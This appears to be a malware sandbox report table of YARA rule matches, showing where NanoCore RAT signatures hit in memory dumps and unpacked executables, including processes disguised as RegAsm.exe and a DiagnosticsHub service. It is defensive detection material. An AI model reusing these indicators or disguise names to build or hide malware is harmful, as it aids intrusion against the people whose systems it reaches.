00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf73d:$a: NanoCore 0xf74d:$a: NanoCore 0xf981:$a: NanoCore 0xf995:$a: NanoCore 0xf9d5:$a: NanoCore 0xf79c:$b: ClientPlugin 0xf99e:$b: ClientPlugin 0xf9de:$b: ClientPlugin 0xf8c3:$c: ProjectData 0x102ca:$d: DESCrypto 0x17c96:$e: KeepAlive 0x15c84:$g: LogClientMessage 0x11e7f:$i: get_Connected 0x10600:$j: #=q 0x10630:$j: #=q 0x1064c:$j: #=q 0x1067c:$j: #=q 0x10698:$j: #=q 0x106b4:$j: #=q 0x106e4:$j: #=q 0x10700:$j: #=q
0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111a5:$x1: NanoCore.ClientPluginHost 0x111e2:$x2: IClientNetworkHost 0x14d15:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f0d:$a: NanoCore 0x10f1d:$a: NanoCore 0x11151:$a: NanoCore 0x11165:$a: NanoCore 0x111a5:$a: NanoCore 0x10f6c:$b: ClientPlugin 0x1116e:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x11093:$c: ProjectData 0x11a9a:$d: DESCrypto 0x19466:$e: KeepAlive 0x17454:$g: LogClientMessage 0x1364f:$i: get_Connected 0x11dd0:$j: #=q 0x11e00:$j: #=q 0x11e1c:$j: #=q 0x11e4c:$j: #=q 0x11e68:$j: #=q 0x11e84:$j: #=q 0x11eb4:$j: #=q 0x11ed0:$j: #=q
0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3311d:$x1: NanoCore.ClientPluginHost 0x3315a:$x2: IClientNetworkHost 0x36c8d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x32e85:$a: NanoCore 0x32e95:$a: NanoCore 0x330c9:$a: NanoCore 0x330dd:$a: NanoCore 0x3311d:$a: NanoCore 0x32ee4:$b: ClientPlugin 0x330e6:$b: ClientPlugin 0x33126:$b: ClientPlugin 0x3300b:$c: ProjectData 0x33a12:$d: DESCrypto 0x3b3de:$e: KeepAlive 0x393cc:$g: LogClientMessage 0x355c7:$i: get_Connected 0x33d48:$j: #=q 0x33d78:$j: #=q 0x33d94:$j: #=q 0x33dc4:$j: #=q 0x33de0:$j: #=q 0x33dfc:$j: #=q 0x33e2c:$j: #=q 0x33e48:$j: #=q
0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xfafd:$x1: NanoCore.ClientPluginHost 0x42505:$x1: NanoCore.ClientPluginHost 0xfb3a:$x2: IClientNetworkHost 0x42542:$x2: IClientNetworkHost 0x1366d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46075:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf865:$a: NanoCore 0xf875:$a: NanoCore 0xfaa9:$a: NanoCore 0xfabd:$a: NanoCore 0xfafd:$a: NanoCore 0x4226d:$a: NanoCore 0x4227d:$a: NanoCore 0x424b1:$a: NanoCore 0x424c5:$a: NanoCore 0x42505:$a: NanoCore 0xf8c4:$b: ClientPlugin 0xfac6:$b: ClientPlugin 0xfb06:$b: ClientPlugin 0x422cc:$b: ClientPlugin 0x424ce:$b: ClientPlugin 0x4250e:$b: ClientPlugin 0xf9eb:$c: ProjectData 0x423f3:$c: ProjectData 0x103f2:$d: DESCrypto 0x42dfa:$d: DESCrypto 0x17dbe:$e: KeepAlive
0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10225:$x1: NanoCore.ClientPluginHost 0x10262:$x2: IClientNetworkHost 0x13d95:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff8d:$a: NanoCore 0xff9d:$a: NanoCore 0x101d1:$a: NanoCore 0x101e5:$a: NanoCore 0x10225:$a: NanoCore 0xffec:$b: ClientPlugin 0x101ee:$b: ClientPlugin 0x1022e:$b: ClientPlugin 0x10113:$c: ProjectData 0x10b1a:$d: DESCrypto 0x184e6:$e: KeepAlive 0x164d4:$g: LogClientMessage 0x126cf:$i: get_Connected 0x10e50:$j: #=q 0x10e80:$j: #=q 0x10e9c:$j: #=q 0x10ecc:$j: #=q 0x10ee8:$j: #=q 0x10f04:$j: #=q 0x10f34:$j: #=q 0x10f50:$j: #=q
0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10225:$x1: NanoCore.ClientPluginHost 0x10262:$x2: IClientNetworkHost 0x13d95:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff8d:$a: NanoCore 0xff9d:$a: NanoCore 0x101d1:$a: NanoCore 0x101e5:$a: NanoCore 0x10225:$a: NanoCore 0xffec:$b: ClientPlugin 0x101ee:$b: ClientPlugin 0x1022e:$b: ClientPlugin 0x10113:$c: ProjectData 0x10b1a:$d: DESCrypto 0x184e6:$e: KeepAlive 0x164d4:$g: LogClientMessage 0x126cf:$i: get_Connected 0x10e50:$j: #=q 0x10e80:$j: #=q 0x10e9c:$j: #=q 0x10ecc:$j: #=q 0x10ee8:$j: #=q 0x10f04:$j: #=q 0x10f34:$j: #=q 0x10f50:$j: #=q
00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3c225:$x1: NanoCore.ClientPluginHost 0x3c262:$x2: IClientNetworkHost 0xe267:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3fd95:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3bf8d:$a: NanoCore 0x3bf9d:$a: NanoCore 0x3c1d1:$a: NanoCore 0x3c1e5:$a: NanoCore 0x3c225:$a: NanoCore 0x3bfec:$b: ClientPlugin 0x3c1ee:$b: ClientPlugin 0x3c22e:$b: ClientPlugin 0x3c113:$c: ProjectData 0x3cb1a:$d: DESCrypto 0x444e6:$e: KeepAlive 0x1085c:$g: LogClientMessage 0x424d4:$g: LogClientMessage 0x3e6cf:$i: get_Connected 0xb436:$j: #=q 0xb6b5:$j: #=q 0xc671:$j: #=q 0xd587:$j: #=q 0xd5a3:$j: #=q 0xd5d3:$j: #=q 0xd5ef:$j: #=q
0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10505:$x1: NanoCore.ClientPluginHost 0x10542:$x2: IClientNetworkHost 0x14075:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1026d:$a: NanoCore 0x1027d:$a: NanoCore 0x104b1:$a: NanoCore 0x104c5:$a: NanoCore 0x10505:$a: NanoCore 0x102cc:$b: ClientPlugin 0x104ce:$b: ClientPlugin 0x1050e:$b: ClientPlugin 0x103f3:$c: ProjectData 0x10dfa:$d: DESCrypto 0x187c6:$e: KeepAlive 0x167b4:$g: LogClientMessage 0x129af:$i: get_Connected 0x11130:$j: #=q 0x11160:$j: #=q 0x1117c:$j: #=q 0x111ac:$j: #=q 0x111c8:$j: #=q 0x111e4:$j: #=q 0x11214:$j: #=q 0x11230:$j: #=q
00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10195:$x1: NanoCore.ClientPluginHost 0x439d5:$x1: NanoCore.ClientPluginHost 0x763dd:$x1: NanoCore.ClientPluginHost 0x101d2:$x2: IClientNetworkHost 0x43a12:$x2: IClientNetworkHost 0x7641a:$x2: IClientNetworkHost 0x13d05:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x47545:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x79f4d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfefd:$a: NanoCore 0xff0d:$a: NanoCore 0x10141:$a: NanoCore 0x10155:$a: NanoCore 0x10195:$a: NanoCore 0x4373d:$a: NanoCore 0x4374d:$a: NanoCore 0x43981:$a: NanoCore 0x43995:$a: NanoCore 0x439d5:$a: NanoCore 0x76145:$a: NanoCore 0x76155:$a: NanoCore 0x76389:$a: NanoCore 0x7639d:$a: NanoCore 0x763dd:$a: NanoCore 0xff5c:$b: ClientPlugin 0x1015e:$b: ClientPlugin 0x1019e:$b: ClientPlugin 0x4379c:$b: ClientPlugin 0x4399e:$b: ClientPlugin 0x439de:$b: ClientPlugin
Process Memory Space: RegAsm.exe PID: 4560	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xaf044:$x1: NanoCore.ClientPluginHost 0x1545fd:$x1: NanoCore.ClientPluginHost 0x15a1bc:$x1: NanoCore.ClientPluginHost 0x16b04f:$x1: NanoCore.ClientPluginHost 0x221590:$x1: NanoCore.ClientPluginHost 0x262496:$x1: NanoCore.ClientPluginHost 0x2bc2ea:$x1: NanoCore.ClientPluginHost 0xaf06a:$x2: IClientNetworkHost 0x154623:$x2: IClientNetworkHost 0x15a201:$x2: IClientNetworkHost 0x16b094:$x2: IClientNetworkHost 0x2215f1:$x2: IClientNetworkHost 0x2624bc:$x2: IClientNetworkHost 0x2bc32f:$x2: IClientNetworkHost 0x2269f6:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x234968:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegAsm.exe PID: 4560	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 4560	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x40b0c:$a: NanoCore 0xaef36:$a: NanoCore 0xaefd7:$a: NanoCore 0xaf044:$a: NanoCore 0xaf105:$a: NanoCore 0xaffd6:$a: NanoCore 0xb0029:$a: NanoCore 0xb0062:$a: NanoCore 0xb00d5:$a: NanoCore 0x1544ef:$a: NanoCore 0x154590:$a: NanoCore 0x1545fd:$a: NanoCore 0x1546be:$a: NanoCore 0x15558f:$a: NanoCore 0x1555e2:$a: NanoCore 0x15561b:$a: NanoCore 0x15568e:$a: NanoCore 0x15a136:$a: NanoCore 0x15a163:$a: NanoCore 0x15a1bc:$a: NanoCore 0x1619cb:$a: NanoCore
Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5d0e:$x1: NanoCore.ClientPluginHost 0x2461c:$x1: NanoCore.ClientPluginHost 0x42f2a:$x1: NanoCore.ClientPluginHost 0x1cab6a:$x1: NanoCore.ClientPluginHost 0x26ca50:$x1: NanoCore.ClientPluginHost 0x2e181f:$x1: NanoCore.ClientPluginHost 0x3a6ada:$x1: NanoCore.ClientPluginHost 0x425d1a:$x1: NanoCore.ClientPluginHost 0x45fd08:$x1: NanoCore.ClientPluginHost 0x47e790:$x1: NanoCore.ClientPluginHost 0x4a74f4:$x1: NanoCore.ClientPluginHost 0x51f9b3:$x1: NanoCore.ClientPluginHost 0x53e2c1:$x1: NanoCore.ClientPluginHost 0x5fdbc3:$x1: NanoCore.ClientPluginHost 0x61ce14:$x1: NanoCore.ClientPluginHost 0x65ccfb:$x1: NanoCore.ClientPluginHost 0x692ea6:$x1: NanoCore.ClientPluginHost 0x5d6f:$x2: IClientNetworkHost 0x2467d:$x2: IClientNetworkHost 0x42f8b:$x2: IClientNetworkHost 0x1cabcb:$x2: IClientNetworkHost
Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x5813:$a: NanoCore 0x582f:$a: NanoCore 0x598a:$a: NanoCore 0x5999:$a: NanoCore 0x5c72:$a: NanoCore 0x5c9e:$a: NanoCore 0x5d0e:$a: NanoCore 0x15750:$a: NanoCore 0x15762:$a: NanoCore 0x1579e:$a: NanoCore 0x24121:$a: NanoCore 0x2413d:$a: NanoCore 0x24298:$a: NanoCore 0x242a7:$a: NanoCore 0x24580:$a: NanoCore 0x245ac:$a: NanoCore 0x2461c:$a: NanoCore 0x3405e:$a: NanoCore 0x34070:$a: NanoCore 0x340ac:$a: NanoCore 0x42a2f:$a: NanoCore
Process Memory Space: RegAsm.exe PID: 7108	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xda5d:$x1: NanoCore.ClientPluginHost 0x29e5f:$x1: NanoCore.ClientPluginHost 0x2fa1e:$x1: NanoCore.ClientPluginHost 0x4089b:$x1: NanoCore.ClientPluginHost 0x50ab9:$x1: NanoCore.ClientPluginHost 0xda83:$x2: IClientNetworkHost 0x29e85:$x2: IClientNetworkHost 0x2fa63:$x2: IClientNetworkHost 0x408e0:$x2: IClientNetworkHost 0x50b1a:$x2: IClientNetworkHost 0x55f1f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x63e91:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegAsm.exe PID: 7108	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 7108	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xd34:$a: NanoCore 0xdb9:$a: NanoCore 0xea4:$a: NanoCore 0xd94f:$a: NanoCore 0xd9f0:$a: NanoCore 0xda5d:$a: NanoCore 0xdb1e:$a: NanoCore 0xe9ef:$a: NanoCore 0xea42:$a: NanoCore 0xea7b:$a: NanoCore 0xeaee:$a: NanoCore 0x10073:$a: NanoCore 0x1037d:$a: NanoCore 0x1039b:$a: NanoCore 0x103dd:$a: NanoCore 0x10414:$a: NanoCore 0x10432:$a: NanoCore 0x29d51:$a: NanoCore 0x29df2:$a: NanoCore 0x29e5f:$a: NanoCore 0x29f20:$a: NanoCore
Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x92b24:$x1: NanoCore.ClientPluginHost 0xef9b0:$x1: NanoCore.ClientPluginHost 0x10e2bf:$x1: NanoCore.ClientPluginHost 0x14c181:$x1: NanoCore.ClientPluginHost 0x18a2f8:$x1: NanoCore.ClientPluginHost 0x1a9828:$x1: NanoCore.ClientPluginHost 0x204a47:$x1: NanoCore.ClientPluginHost 0x225a2c:$x1: NanoCore.ClientPluginHost 0x288491:$x1: NanoCore.ClientPluginHost 0x31ffbf:$x1: NanoCore.ClientPluginHost 0x33eca9:$x1: NanoCore.ClientPluginHost 0x35d5b7:$x1: NanoCore.ClientPluginHost 0x92b85:$x2: IClientNetworkHost 0xefa11:$x2: IClientNetworkHost 0x10e320:$x2: IClientNetworkHost 0x14c1e2:$x2: IClientNetworkHost 0x18a359:$x2: IClientNetworkHost 0x1a9889:$x2: IClientNetworkHost 0x204aa8:$x2: IClientNetworkHost 0x225a8d:$x2: IClientNetworkHost 0x2884f2:$x2: IClientNetworkHost
Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x11321:$a: NanoCore 0x30798:$a: NanoCore 0x58a3f:$a: NanoCore 0x92629:$a: NanoCore 0x92645:$a: NanoCore 0x927a0:$a: NanoCore 0x927af:$a: NanoCore 0x92a88:$a: NanoCore 0x92ab4:$a: NanoCore 0x92b24:$a: NanoCore 0xa2566:$a: NanoCore 0xa2578:$a: NanoCore 0xa25b4:$a: NanoCore 0xb06b3:$a: NanoCore 0xcfa7e:$a: NanoCore 0xef4b5:$a: NanoCore 0xef4d1:$a: NanoCore 0xef62c:$a: NanoCore 0xef63b:$a: NanoCore 0xef914:$a: NanoCore 0xef940:$a: NanoCore
Click to see the 96 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.RegAsm.exe.5210000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
1.2.RegAsm.exe.5210000.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.RegAsm.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
1.2.RegAsm.exe.54b0000.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
1.2.RegAsm.exe.54b0000.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
1.2.RegAsm.exe.54b0000.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
1.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.RegAsm.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
